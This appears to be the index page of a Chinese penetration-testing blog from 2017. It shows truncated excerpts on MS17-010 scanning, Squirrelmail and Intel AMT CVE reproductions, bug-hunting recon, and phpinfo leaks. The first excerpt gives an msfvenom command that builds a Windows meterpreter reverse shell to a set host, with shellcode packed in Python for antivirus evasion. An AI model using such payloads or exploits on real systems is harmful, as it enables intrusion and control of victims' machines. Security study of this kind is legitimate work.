热门 Metasploit生成免杀payload笔记

时间:2017-5-22   作者:webbaozi   分类: 渗透测试   热度:1653°    
时间:2017-5-22   分类: 渗透测试    热度:1653  
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -i 11 -f py -o msf.py 然后更改z.py样式如下: from ctypes import * import ctypes buf = "" buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29" buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\x...

阅读全文>>

热门 MS17-010漏洞检测与内网穿透技术的应用

时间:2017-5-15   作者:webbaozi   分类: 渗透测试   热度:4003°    
时间:2017-5-15   分类: 渗透测试    热度:4003  
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。 首先是环境的搭建,具体如下表所示: 主机 IP 备注 ...

阅读全文>>

热门 Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

时间:2017-5-14   作者:webbaozi   分类: 渗透测试   热度:1209°    
时间:2017-5-14   分类: 渗透测试    热度:1209  
一:实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中,在initStream函数中,使用了escapeshellcmd()来过滤用户的信息,然后将处理后的字...

阅读全文>>

热门 CVE-2017-5689(Intel产品AMT)利用小脚本

时间:2017-5-11   作者:webbaozi   分类: 渗透测试   热度:1636°    
时间:2017-5-11   分类: 渗透测试    热度:1636  
检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm #!/usr/bin/python # -*- coding: utf-8 -*- #by hackteam.cn import requests def exploit(url): status = False headers = {"User-Agent": "Mozilla/5.0"} httprsp = requests.get(url, headers=header...

阅读全文>>

热门 漏洞挖掘经验分享

时间:2017-4-29   作者:webbaozi   分类: 渗透测试   热度:1193°    
时间:2017-4-29   分类: 渗透测试    热度:1193  
我平时挖洞的经验,我总结了一下,大概有以下几点: 1、收集信息,尽可能的越多越好(主域名、IP段、搜索引擎、GitHub等)。 2、收集好信息后,对收集的信息进行一些扩展,增加信息收集的量(可以用SubDomain工具批量收集厂商域名信息,域名对应IP,数据多了之后,就可以拿来分析域名的真实地址、以及潜在的IP段)。 3、对IP段、子域名等进行大量破解,这里我们要经常收集一些SRC开发常用的端口、以及一些域名的命名习惯(GitHub上面有很多现成的端口,平时收集信息的时候,可以多注意一下)。 4、收集对方的邮箱账号命名习惯(因为好多官方后台都是用...

阅读全文>>

热门 从phpinfo中能获取哪些敏感信息

时间:2017-4-23   作者:webbaozi   分类: 渗透测试   热度:1742°    
时间:2017-4-23   分类: 渗透测试    热度:1742  
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”]) 这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。 二、支持的程序 可以通过phpinfo()查...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1